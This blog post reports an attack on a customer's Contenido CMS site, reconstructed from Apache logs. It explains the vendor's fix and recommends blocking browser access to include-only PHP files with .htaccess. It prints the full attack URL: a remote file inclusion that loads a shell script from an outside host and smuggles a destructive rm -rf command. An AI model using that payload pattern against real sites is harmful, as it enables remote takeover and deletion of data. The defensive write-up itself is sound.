Contenido Code Injection
yesterday one of our customers servers was attacked. the whole Contenido and all other directories were deleted. after checking the Apache logs, it was obvious, what happened:
the IP address 201.19.76.194 started several attacks from 0.55 to 1.00 o'clock. the attacker used a TembeddedWB-based browser and tried to inject code into the Contenido class /contenido/classes/class.inuse.php. the code injected was http://www.tritonsdr2.by.ru/cmd.txt, which tells attackers versions, paths, and gives them a shell. at 0:56 o'clock the injection was successfull and the Apache gave a code 200 on the attack action. after this the website was completely gone. fortunately the database stayed untouched.
details, the full URL used was
/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.tritonsdr2.by.ru/cmd.txt?&cmd=cd%20/data/export/http/WEB_DIR/http;rm%20-rf%20index.html;%20rm%20-rf%20index.*
this manipulated the Contenido-variable
$cfg[path][contenido]in a way that class.inuse.php included and ran the malicious code on the machine. the code deleted the index documents. this security hole is already described and fixed. the fix from the contenido developers is:
if ($_GET["cfg"] || $_POST["cfg"])
{
die();
}this is not a bad solution, but rather a workaround. code injection can be done whereever things are included based on variables or variable-evals are made, without taking care of manipulations. so nearly every big system can have potential security holes like this.
best design is: divide PHP run by the browser from PHP that is included and protect inclusion-PHP with .htaccess. the .htaccess-file is rather simple:
Options None
Order allow,deny
Deny from allthis denies access to anyone coming with a browser.
related:
Contenido
Apache
TembeddedWB
Security Hole Report
Contenido Fix (german)
